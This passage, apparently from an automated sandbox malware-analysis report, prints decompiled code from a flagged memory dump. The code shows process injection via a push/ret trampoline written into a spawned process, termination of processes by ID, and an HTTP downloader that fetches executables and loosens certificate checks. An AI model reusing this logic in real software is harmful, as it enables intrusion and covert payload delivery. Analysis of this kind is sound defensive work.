                                                                                                        																											__eflags = (_t285 & 0x0000f000) - 0x3000;
                                                                                                        																											if((_t285 & 0x0000f000) == 0x3000) {
                                                                                                        																												_t286 = _t285 & 0x00000fff;
                                                                                                        																												_t114 =  &(_t278[_t286]);
                                                                                                        																												 *_t114 =  &(_t278[_t286][_t301]);
                                                                                                        																												__eflags =  *_t114;
                                                                                                        																											}
                                                                                                        																											_t314 =  &(_t314[1]);
                                                                                                        																											__eflags = _t291;
                                                                                                        																										} while (_t291 != 0);
                                                                                                        																										_t284 = _v8;
                                                                                                        																										_t299 = _v36;
                                                                                                        																									}
                                                                                                        																									_t299 = _t299 +  *_v20;
                                                                                                        																									_v36 = _t299;
                                                                                                        																									__eflags = _t299 - _v92;
                                                                                                        																									if(_t299 < _v92) {
                                                                                                        																										continue;
                                                                                                        																									}
                                                                                                        																									break;
                                                                                                        																								}
                                                                                                        																								_t287 = _v24;
                                                                                                        																							}
                                                                                                        																							_v88 = 0x68;
                                                                                                        																							_v87 = _v80 + _t287;
                                                                                                        																							_v83 = 0xc3;
                                                                                                        																							E00401640( &(_v16[_v72]),  &_v88, 6);
                                                                                                        																							_t225 = E00407120(_t287, _v56.hProcess, _v12, 0);
                                                                                                        																							__eflags = _t225;
                                                                                                        																							if(_t225 != 0) {
                                                                                                        																								goto L8;
                                                                                                        																							} else {
                                                                                                        																								_v76 = _v12;
                                                                                                        																								_t229 = E00406FE0(_t284, _t287, _v28, _v56.hProcess,  &_v76, 0, 0, 0,  &_v64, 1, 0, 0x40);
                                                                                                        																								__eflags = _t229;
                                                                                                        																								if(_t229 != 0) {
                                                                                                        																									goto L8;
                                                                                                        																								} else {
                                                                                                        																									E004071A0(_t284, _t287, _v56.hThread);
                                                                                                        																									Sleep(0x1388);
                                                                                                        																									_t312 = VirtualAlloc(0, 0x138, 0x3000, 4);
                                                                                                        																									__eflags = _t312;
                                                                                                        																									if(_t312 != 0) {
                                                                                                        																										E00401BB0(_t312, 0, 0x138);
                                                                                                        																										asm("cdq");
                                                                                                        																										E004074D0(_t284, _t287, _v56.hProcess, _v24, _t287, _t312, 0x138,  &_v80);
                                                                                                        																										VirtualFree(_t312, 0, 0x8000);
                                                                                                        																									}
                                                                                                        																									CloseHandle(_v56);
                                                                                                        																									CloseHandle(_v56.hThread);
                                                                                                        																									_t234 = _v28;
                                                                                                        																									__eflags = _t234;
                                                                                                        																									if(_t234 != 0) {
                                                                                                        																										NtClose(_t234);
                                                                                                        																									}
                                                                                                        																									_t235 = _v32;
                                                                                                        																									__eflags = _t235;
                                                                                                        																									if(_t235 != 0) {
                                                                                                        																										NtClose(_t235);
                                                                                                        																									}
                                                                                                        																									asm("cdq");
                                                                                                        																									E00407120(_t287, GetCurrentProcess(), _v16, _t287);
                                                                                                        																									asm("cdq");
                                                                                                        																									E00407120(_t287, GetCurrentProcess(), _v8, _t287);
                                                                                                        																									_t147 =  &(_v56.dwProcessId); // 0x40306e
                                                                                                        																									return  *_t147;
                                                                                                        																								}
                                                                                                        																							}
                                                                                                        																						} else {
                                                                                                        																							goto L40;
                                                                                                        																						}
                                                                                                        																						goto L69;
                                                                                                        																						L40:
                                                                                                        																						_t287 = E00408B00( &(_t208[_t284]));
                                                                                                        																						_t320 = _t320 + 4;
                                                                                                        																						_v20 = _t287;
                                                                                                        																						__eflags = _t287;
                                                                                                        																						if(_t287 == 0) {
                                                                                                        																							goto L8;
                                                                                                        																						} else {
                                                                                                        																							_t284 = _v8;
                                                                                                        																							_t309 =  &(_t284[ *_t275]);
                                                                                                        																							_t297 =  &(_t284[_t275[0x10]]);
                                                                                                        																							__eflags = _t309 - _t284;
                                                                                                        																							_t310 =  ==  ? _t297 : _t309;
                                                                                                        																							__eflags = _t310 - _t284;
                                                                                                        																							if(_t310 == _t284) {
                                                                                                        																								goto L8;
                                                                                                        																							} else {
                                                                                                        																								_t211 =  *_t310;
                                                                                                        																								__eflags = _t211;
                                                                                                        																								if(_t211 == 0) {
                                                                                                        																									L49:
                                                                                                        																									_t275 =  &(_t275[0x14]);
                                                                                                        																									continue;
                                                                                                        																								} else {
                                                                                                        																									while(1) {
                                                                                                        																										__eflags = _t211;
                                                                                                        																										if(_t211 >= 0) {
                                                                                                        																											_t213 = _t211 + 2 + _t284;
                                                                                                        																											__eflags = _t213;
                                                                                                        																										} else {
                                                                                                        																											_t213 = _t211 & 0x0000ffff;
                                                                                                        																										}
                                                                                                        																										_t214 = GetProcAddress(_t287, _t213);
                                                                                                        																										 *_t297 = _t214;
                                                                                                        																										__eflags = _t214;
                                                                                                        																										if(_t214 == 0) {
                                                                                                        																											goto L8;
                                                                                                        																										}
                                                                                                        																										_t211 = _t310[2];
                                                                                                        																										_t310 =  &(_t310[2]);
                                                                                                        																										_t284 = _v8;
                                                                                                        																										_t297 = _t297 + 4;
                                                                                                        																										__eflags = _t211;
                                                                                                        																										if(_t211 == 0) {
                                                                                                        																											goto L49;
                                                                                                        																										} else {
                                                                                                        																											_t287 = _v20;
                                                                                                        																											continue;
                                                                                                        																										}
                                                                                                        																										goto L69;
                                                                                                        																									}
                                                                                                        																									goto L8;
                                                                                                        																								}
                                                                                                        																							}
                                                                                                        																						}
                                                                                                        																						goto L69;
                                                                                                        																					}
                                                                                                        																				} else {
                                                                                                        																					VirtualFree(_t305, _t199, 0x8000);
                                                                                                        																					goto L8;
                                                                                                        																				}
                                                                                                        																			}
                                                                                                        																		}
                                                                                                        																	}
                                                                                                        																}
                                                                                                        															}
                                                                                                        														}
                                                                                                        													}
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        								} else {
                                                                                                        									goto L8;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					return _t154;
                                                                                                        				}
                                                                                                        				L69:
                                                                                                        			}
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004058db
                                                                                                        0x004058de
                                                                                                        0x004058e1
                                                                                                        0x004058e6
                                                                                                        0x004058ec
                                                                                                        0x004058ec
                                                                                                        0x004058ee
                                                                                                        0x004058f0
                                                                                                        0x004058f3
                                                                                                        0x004058f3
                                                                                                        0x004058f6
                                                                                                        0x004058fe
                                                                                                        0x00405903
                                                                                                        0x00405905
                                                                                                        0x0040590b
                                                                                                        0x0040590b
                                                                                                        0x0040590b
                                                                                                        0x0040590b
                                                                                                        0x0040590e
                                                                                                        0x00405911
                                                                                                        0x00405911
                                                                                                        0x00405915
                                                                                                        0x00405918
                                                                                                        0x00405918
                                                                                                        0x0040591e
                                                                                                        0x00405920
                                                                                                        0x00405923
                                                                                                        0x00405926
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405926
                                                                                                        0x00405928
                                                                                                        0x00405928
                                                                                                        0x00405930
                                                                                                        0x00405934
                                                                                                        0x00405944
                                                                                                        0x00405948
                                                                                                        0x00405958
                                                                                                        0x0040595d
                                                                                                        0x0040595f
                                                                                                        0x00000000
                                                                                                        0x00405965
                                                                                                        0x0040596e
                                                                                                        0x00405985
                                                                                                        0x0040598a
                                                                                                        0x0040598c
                                                                                                        0x00000000
                                                                                                        0x00405992
                                                                                                        0x00405995
                                                                                                        0x0040599f
                                                                                                        0x004059b9
                                                                                                        0x004059bb
                                                                                                        0x004059bd
                                                                                                        0x004059c7
                                                                                                        0x004059dc
                                                                                                        0x004059e2
                                                                                                        0x004059ef
                                                                                                        0x004059ef
                                                                                                        0x004059fe
                                                                                                        0x00405a03
                                                                                                        0x00405a05
                                                                                                        0x00405a08
                                                                                                        0x00405a0a
                                                                                                        0x00405a0d
                                                                                                        0x00405a0d
                                                                                                        0x00405a13
                                                                                                        0x00405a16
                                                                                                        0x00405a18
                                                                                                        0x00405a1b
                                                                                                        0x00405a1b
                                                                                                        0x00405a2a
                                                                                                        0x00405a30
                                                                                                        0x00405a38
                                                                                                        0x00405a3e
                                                                                                        0x00405a43
                                                                                                        0x00405a4c
                                                                                                        0x00405a4c
                                                                                                        0x0040598c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040583c
                                                                                                        0x00405844
                                                                                                        0x00405846
                                                                                                        0x00405849
                                                                                                        0x0040584c
                                                                                                        0x0040584e
                                                                                                        0x00000000
                                                                                                        0x00405854
                                                                                                        0x00405854
                                                                                                        0x0040585c
                                                                                                        0x0040585e
                                                                                                        0x00405860
                                                                                                        0x00405862
                                                                                                        0x00405865
                                                                                                        0x00405867
                                                                                                        0x00000000
                                                                                                        0x0040586d
                                                                                                        0x0040586d
                                                                                                        0x0040586f
                                                                                                        0x00405871
                                                                                                        0x004058a8
                                                                                                        0x004058a8
                                                                                                        0x00000000
                                                                                                        0x00405873
                                                                                                        0x00405873
                                                                                                        0x00405873
                                                                                                        0x00405875
                                                                                                        0x0040587f
                                                                                                        0x0040587f
                                                                                                        0x00405877
                                                                                                        0x00405877
                                                                                                        0x00405877
                                                                                                        0x00405883
                                                                                                        0x00405889
                                                                                                        0x0040588b
                                                                                                        0x0040588d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405893
                                                                                                        0x00405896
                                                                                                        0x00405899
                                                                                                        0x0040589c
                                                                                                        0x0040589f
                                                                                                        0x004058a1
                                                                                                        0x00000000
                                                                                                        0x004058a3
                                                                                                        0x004058a3
                                                                                                        0x00000000
                                                                                                        0x004058a3
                                                                                                        0x00000000
                                                                                                        0x004058a1
                                                                                                        0x00000000
                                                                                                        0x00405873
                                                                                                        0x00405871
                                                                                                        0x00405867
                                                                                                        0x00000000
                                                                                                        0x0040584e
                                                                                                        0x004057a0
                                                                                                        0x004057a7
                                                                                                        0x00000000
                                                                                                        0x004057a7
                                                                                                        0x0040579e
                                                                                                        0x0040578a
                                                                                                        0x00405771
                                                                                                        0x00405748
                                                                                                        0x00405718
                                                                                                        0x004056e8
                                                                                                        0x004056c1
                                                                                                        0x00405696
                                                                                                        0x0040567a
                                                                                                        0x0040566b
                                                                                                        0x0040564d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405577
                                                                                                        0x00405571
                                                                                                        0x0040554e
                                                                                                        0x0040551c
                                                                                                        0x0040551c
                                                                                                        0x0040551c
                                                                                                        0x00000000

APIs
• CreateProcessW.KERNEL32 ref: 0040550E
• GetThreadContext.KERNEL32(?,?,I@,00000000,?,?,?,?,?,?), ref: 00405546
• ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,?), ref: 0040556D
• TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00405588
• CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00405597
• CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0040559C
• NtClose.NTDLL(00000000), ref: 004055A6
• NtClose.NTDLL(00000000), ref: 004055B4
• GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 004055C4
• GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 004055D6
• ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,?), ref: 00405614
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,00000000,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 00405707
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,00000000,00000000), ref: 00405737
• VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,00000000,00000000), ref: 00405780
• ReadProcessMemory.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040579A
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?), ref: 004057A7
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004057C7
• GetProcAddress.KERNEL32(00000000,-00000002), ref: 00405883
• Sleep.KERNEL32(00001388,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,?,00000000,00000000), ref: 0040599F
• VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004), ref: 004059B3
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,00000000,00000138,?), ref: 004059EF
• CloseHandle.KERNEL32(?), ref: 004059FE
• CloseHandle.KERNEL32(?), ref: 00405A03
• NtClose.NTDLL(00000000), ref: 00405A0D
• NtClose.NTDLL(00000000), ref: 00405A1B
• GetCurrentProcess.KERNEL32(00000000), ref: 00405A2D
• GetCurrentProcess.KERNEL32(00000000,?,00000000), ref: 00405A3B
Strings
Memory Dump Source
• Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Process$Close$Current$Virtual$Handle$FreeMemoryRead$Alloc$AddressContextCreateProcSleepTerminateThread
• String ID: 0125789244697858$D$h$n0@$I@
• API String ID: 937709717-631519299
• Opcode ID: 11f14d760a250409a41159bc870c405dcb3f81ba558e8e19d0d86d0464d3cc20
• Instruction ID: 0427067da74405bbc224276ff2be7b89c7662c3791b2ba589faee8c975da3b6f
• Opcode Fuzzy Hash: 11f14d760a250409a41159bc870c405dcb3f81ba558e8e19d0d86d0464d3cc20
• Instruction Fuzzy Hash: CF124971E00609ABEB20DB94DD45FAFBBB9EF04704F144166FA04B72D1E778AD448B68
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 00408823
• NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 0040887E
• NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004088A0
• NtClose.NTDLL(00000000), ref: 004088AD
• NtClose.NTDLL(00000000), ref: 004088B9
Memory Dump Source
• Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CloseFilePath$CreateNameName_Write
• String ID:
• API String ID: 589302162-0
• Opcode ID: 4b83241a22351649e877d0acaabcec9a9ade22e4702b4ae3c0257c1d2849f9e0
• Instruction ID: cdde318fc824664ac6a874490e4e1e0a00434436370c8205e3f3d3f15e695731
• Opcode Fuzzy Hash: 4b83241a22351649e877d0acaabcec9a9ade22e4702b4ae3c0257c1d2849f9e0
• Instruction Fuzzy Hash: D5310CB1D4020DBBEB10DF90DD49BEEBBB8EB04704F20415AF904B62D0D7B566589F99
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E00408730(char _a4) {
                                                                                                        				void* _v8;
                                                                                                        				intOrPtr _v12;
                                                                                                        				void* _v16;
                                                                                                        				intOrPtr _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				void* _v40;
                                                                                                        				void* _t23;
                                                                                                        				void* _t25;
                                                                                                        				void* _t29;
                                                                                                        
                                                                                                        				_t1 =  &_a4; // 0x404a23
                                                                                                        				_v16 =  *_t1;
                                                                                                        				_v8 = 0;
                                                                                                        				_v40 = 0x18;
                                                                                                        				_v36 = 0;
                                                                                                        				_v28 = 0;
                                                                                                        				_v32 = 0;
                                                                                                        				_v24 = 0;
                                                                                                        				_v20 = 0;
                                                                                                        				_v12 = 0;
                                                                                                        				if(NtOpenProcess( &_v8, 1,  &_v40,  &_v16) == 0) {
                                                                                                        					_t23 = _v8;
                                                                                                        					if(_t23 == 0) {
                                                                                                        						goto L1;
                                                                                                        					} else {
                                                                                                        						_t25 =  *0x5d10b0(_t23, 0, _t29);
                                                                                                        						NtClose(_v8);
                                                                                                        						return 0 | _t25 == 0x00000000;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					L1:
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        			}
                                                                                                        Instruction addresses: 0x00408736, 0x00408739, 0x00408743, 0x00408750, 0x00408758, 0x0040875f, 0x00408766, 0x0040876d, 0x00408774, 0x0040877b, 0x0040878a, 0x00408792, 0x00408797, 0x00000000, 0x00408799, 0x0040879d, 0x004087a8, 0x004087b9, 0x004087b9, 0x0040878c, 0x0040878c, 0x00408791, 0x00408791

                                                                                                        APIs
                                                                                                        • NtOpenProcess.NTDLL(00000000,00000001,?,?), ref: 00408782
                                                                                                        • NtTerminateProcess.NTDLL(00000000,00000000), ref: 0040879D
                                                                                                        • NtClose.NTDLL(00000000), ref: 004087A8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$CloseOpenTerminate
                                                                                                        • String ID: #J@
                                                                                                        • API String ID: 4223285941-3103836084
                                                                                                        • Opcode ID: 0cd67fea19399cdfc16dda180af005950f28b9e31626766ad2c06f3bb9fa3847
                                                                                                        • Instruction ID: 8b2c6ad6389722ad4d186c6c61001f468c4fd018603b84c5e18b7e3fb15685ad
                                                                                                        • Opcode Fuzzy Hash: 0cd67fea19399cdfc16dda180af005950f28b9e31626766ad2c06f3bb9fa3847
                                                                                                        • Instruction Fuzzy Hash: 5B010C71E0120CABDB10DFA0D948BDFBBF8EB04305F14419AE808F7280D7799A489BD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00401800(intOrPtr* _a4) {
                                                                                                        				void* _t5;
                                                                                                        				void* _t8;
                                                                                                        				void* _t9;
                                                                                                        				void _t10;
                                                                                                        				intOrPtr* _t11;
                                                                                                        				void* _t12;
                                                                                                        
                                                                                                        				_t11 = _a4;
                                                                                                        				_t5 = 0;
                                                                                                        				if( *_t11 != 0) {
                                                                                                        					do {
                                                                                                        						_t5 = _t5 + 1;
                                                                                                        					} while ( *((char*)(_t5 + _t11)) != 0);
                                                                                                        				}
                                                                                                        				_t8 = HeapAlloc(GetProcessHeap(), 0, _t5 + 1);
                                                                                                        				_t10 =  *_t11;
                                                                                                        				_t9 = _t8;
                                                                                                        				if(_t10 != 0) {
                                                                                                        					_t12 = _t11 - _t8;
                                                                                                        					do {
                                                                                                        						 *_t9 = _t10;
                                                                                                        						_t9 = _t9 + 1;
                                                                                                        						_t10 =  *((intOrPtr*)(_t12 + _t9));
                                                                                                        					} while (_t10 != 0);
                                                                                                        				}
                                                                                                        				 *_t9 = 0;
                                                                                                        				return _t8;
                                                                                                        			}
                                                                                                        Instruction addresses: 0x00401804, 0x00401807, 0x0040180b, 0x00401810, 0x00401810, 0x00401811, 0x00401810, 0x00401822, 0x00401828, 0x0040182a, 0x0040182e, 0x00401830, 0x00401832, 0x00401832, 0x00401834, 0x00401837, 0x0040183a, 0x00401832, 0x0040183e, 0x00401843

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000001,?,?,004052B1,?), ref: 0040181B
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,004052B1,?), ref: 00401822
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 1617791916-0
                                                                                                        • Opcode ID: 3da18ee757283d3823c3ecc1c7d213f8c7222e7c0b475c9d3fce85658518ca9d
                                                                                                        • Instruction ID: b73465cae51e9fc63f2ab920ad57f2ce1bbeed3a8eb4a9efde1b3dbfd0151c34
                                                                                                        • Opcode Fuzzy Hash: 3da18ee757283d3823c3ecc1c7d213f8c7222e7c0b475c9d3fce85658518ca9d
                                                                                                        • Instruction Fuzzy Hash: ECF055320092909EEB222F3488443727FE99F0B344F1C84EED8C59B3A2D63B8D48C394
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00406D50() {
                                                                                                        				void* _t1;
                                                                                                        
                                                                                                        				_t1 =  *0x5d2df8; // 0x3fc
                                                                                                        				if(_t1 != 0 && _t1 != 0xffffffff) {
                                                                                                        					return NtClose(_t1);
                                                                                                        				}
                                                                                                        				return _t1;
                                                                                                        			}
                                                                                                        Instruction addresses: 0x00406d50, 0x00406d57, 0x00000000, 0x00406d5f, 0x00406d65

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: 9b87d2fed563e4884bb86ea922c3d925729189868286ecac45f0bef62ca048df
                                                                                                        • Instruction ID: 1cc971618bee3f163804a16a1d445a44e399e0157dcd427ad3a3562554af56f5
                                                                                                        • Opcode Fuzzy Hash: 9b87d2fed563e4884bb86ea922c3d925729189868286ecac45f0bef62ca048df
                                                                                                        • Instruction Fuzzy Hash: D6B0923070564157CE30AB38AC8CA1633685E6032132A0723F037E21E4EA38C8EAA61E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00406D70() {
                                                                                                        				void* _t1;
                                                                                                        
                                                                                                        				_t1 =  *0x5d2dfc; // 0x3f8
                                                                                                        				if(_t1 != 0 && _t1 != 0xffffffff) {
                                                                                                        					return NtClose(_t1);
                                                                                                        				}
                                                                                                        				return _t1;
                                                                                                        			}
                                                                                                        Instruction addresses: 0x00406d70, 0x00406d77, 0x00000000, 0x00406d7f, 0x00406d85

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: 63ba5de6b47e9ee9e8b3dcd5553fb007b603a39dc8debe5b0c00047f8c24c2ac
                                                                                                        • Instruction ID: 76f8495102a0d5e2d14eb48cf16d234cca2194880bcae08c05adfe453fa08bf3
                                                                                                        • Opcode Fuzzy Hash: 63ba5de6b47e9ee9e8b3dcd5553fb007b603a39dc8debe5b0c00047f8c24c2ac
                                                                                                        • Instruction Fuzzy Hash: F4B092307055815BCE70AB79AC4CA1633686E603213150723A83BE12E4EA38C8AEA62D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 95%
                                                                                                        			E00407C30(void* __ecx, void* __edx, void* __eflags, char* _a4, intOrPtr* _a8) {
                                                                                                        				void _v8;
                                                                                                        				void* _v12;
                                                                                                        				void* _v16;
                                                                                                        				void* _v20;
                                                                                                        				long _v24;
                                                                                                        				long _v28;
                                                                                                        				long _v32;
                                                                                                        				char* _v36;
                                                                                                        				char* _v40;
                                                                                                        				char* _v44;
                                                                                                        				char* _v48;
                                                                                                        				char* _v52;
                                                                                                        				intOrPtr _v56;
                                                                                                        				intOrPtr _v64;
                                                                                                        				char* _v68;
                                                                                                        				short _v88;
                                                                                                        				intOrPtr _v92;
                                                                                                        				intOrPtr _v96;
                                                                                                        				intOrPtr _v104;
                                                                                                        				char _v108;
                                                                                                        				void* _v112;
                                                                                                        				long _t53;
                                                                                                        				int _t54;
                                                                                                        				void* _t62;
                                                                                                        				void* _t63;
                                                                                                        				void* _t72;
                                                                                                        				long _t88;
                                                                                                        				long _t103;
                                                                                                        				char* _t108;
                                                                                                        				intOrPtr _t109;
                                                                                                        				char* _t111;
                                                                                                        				void* _t114;
                                                                                                        				long _t116;
                                                                                                        				void* _t123;
                                                                                                        				void* _t125;
                                                                                                        				void* _t126;
                                                                                                        				void* _t127;
                                                                                                        				void* _t128;
                                                                                                        				void* _t129;
                                                                                                        
                                                                                                        				E00401BB0( &_v108, 0, 0x38);
                                                                                                        				_t108 = _a4;
                                                                                                        				_v24 = 0;
                                                                                                        				_t103 = 0;
                                                                                                        				_v112 = 0x3c;
                                                                                                        				_v92 = 0xffffffff;
                                                                                                        				_v104 = 0xffffffff;
                                                                                                        				_v64 = 0xffffffff;
                                                                                                        				_v56 = 0xffffffff;
                                                                                                        				_t53 = E00401850(_t108);
                                                                                                        				_t125 = _t123 + 0x10;
                                                                                                        				_t54 = InternetCrackUrlA(_t108, _t53, 0,  &_v112);
                                                                                                        				if(_t54 != 0) {
                                                                                                        					_t111 = E004015E0(_v92 + 1);
                                                                                                        					E00401BB0(_t111, 0, _v92 + 1);
                                                                                                        					E00401640(_t111, _v96, _v92);
                                                                                                        					_t126 = _t125 + 0x1c;
                                                                                                        					_t62 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0);
                                                                                                        					_v20 = _t62;
                                                                                                        					if(_t62 != 0) {
                                                                                                        						_t63 = InternetConnectA(_t62, _t111, _v88, 0, 0, 3, 0, 0);
                                                                                                        						_v16 = _t63;
                                                                                                        						_push(_t111);
                                                                                                        						if(_t63 != 0) {
                                                                                                        							E00401510();
                                                                                                        							E004018D0(_t108, "https://");
                                                                                                        							_t127 = _t126 + 0xc;
                                                                                                        							_v52 = "text/*";
                                                                                                        							_v48 = "application/exe";
                                                                                                        							_v44 = "application/zlib";
                                                                                                        							_t113 =  !=  ? 0x84ecf300 : 0x846cf300;
                                                                                                        							_v40 = "application/gzip";
                                                                                                        							_v36 = "application/applefile";
                                                                                                        							_v32 = 0;
                                                                                                        							_t114 = HttpOpenRequestA(_v16, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0);
                                                                                                        							_v12 = _t114;
                                                                                                        							if(_t114 == 0) {
                                                                                                        								L24:
                                                                                                        								InternetCloseHandle(_v16);
                                                                                                        								InternetCloseHandle(_v20);
                                                                                                        								return 0;
                                                                                                        							} else {
                                                                                                        								_t72 = E004018D0(_t108, "https://");
                                                                                                        								_t128 = _t127 + 8;
                                                                                                        								if(_t72 == 0) {
                                                                                                        									L10:
                                                                                                        									if(HttpSendRequestA(_t114, 0, 0, 0, 0) == 0) {
                                                                                                        										goto L23;
                                                                                                        									} else {
                                                                                                        										_t116 = 0x400;
                                                                                                        										_t109 = E004015E0(0x400);
                                                                                                        										_t129 = _t128 + 4;
                                                                                                        										if(_t109 == 0) {
                                                                                                        											_t114 = _v12;
                                                                                                        											goto L23;
                                                                                                        										} else {
                                                                                                        											do {
                                                                                                        												if(InternetReadFile(_v12, _t109 + _t103, _t116,  &_v24) == 0) {
                                                                                                        													if(GetLastError() != 0x7a) {
                                                                                                        														E00401510(_t109);
                                                                                                        														L21:
                                                                                                        														InternetCloseHandle(_v12);
                                                                                                        														InternetCloseHandle(_v16);
                                                                                                        														InternetCloseHandle(_v20);
                                                                                                        														return 0;
                                                                                                        													} else {
                                                                                                        														_t116 = _t116 + 0x400;
                                                                                                        														goto L15;
                                                                                                        													}
                                                                                                        												} else {
                                                                                                        													_t88 = _v24;
                                                                                                        													if(_t88 == 0) {
                                                                                                        														InternetCloseHandle(_v12);
                                                                                                        														InternetCloseHandle(_v16);
                                                                                                        														InternetCloseHandle(_v20);
                                                                                                        														 *_a8 = _t109;
                                                                                                        														return _t103;
                                                                                                        													} else {
                                                                                                        														_t103 = _t103 + _t88;
                                                                                                        														goto L15;
                                                                                                        													}
                                                                                                        												}
                                                                                                        												goto L25;
                                                                                                        												L15:
                                                                                                        												_t109 = E004016A0(_t109, _t116 + _t103);
                                                                                                        												_t129 = _t129 + 8;
                                                                                                        											} while (_t109 != 0);
                                                                                                        											goto L21;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								} else {
                                                                                                        									_v8 = 0;
                                                                                                        									_v28 = 4;
                                                                                                        									if(InternetQueryOptionA(_t114, 0x1f,  &_v8,  &_v28) == 0) {
                                                                                                        										L23:
                                                                                                        										InternetCloseHandle(_t114);
                                                                                                        										goto L24;
                                                                                                        									} else {
                                                                                                        										_v8 = _v8 | 0x00000180;
                                                                                                        										if(InternetSetOptionA(_t114, 0x1f,  &_v8, 4) == 0) {
                                                                                                        											goto L23;
                                                                                                        										} else {
                                                                                                        											goto L10;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							E00401510();
                                                                                                        							InternetCloseHandle(_v20);
                                                                                                        							return 0;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						E00401510(_t111);
                                                                                                        						return 0;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					return _t54;
                                                                                                        				}
                                                                                                        				L25:
                                                                                                        			}
                                                                                                        0x00407c40
                                                                                                        0x00407c45
                                                                                                        0x00407c4e
                                                                                                        0x00407c55
                                                                                                        0x00407c57
                                                                                                        0x00407c5e
                                                                                                        0x00407c65
                                                                                                        0x00407c6f
                                                                                                        0x00407c76
                                                                                                        0x00407c7d
                                                                                                        0x00407c82
                                                                                                        0x00407c87
                                                                                                        0x00407c8f
                                                                                                        0x00407ca2
                                                                                                        0x00407cac
                                                                                                        0x00407cb8
                                                                                                        0x00407cbd
                                                                                                        0x00407ccd
                                                                                                        0x00407cd3
                                                                                                        0x00407cd8
                                                                                                        0x00407cfb
                                                                                                        0x00407d01
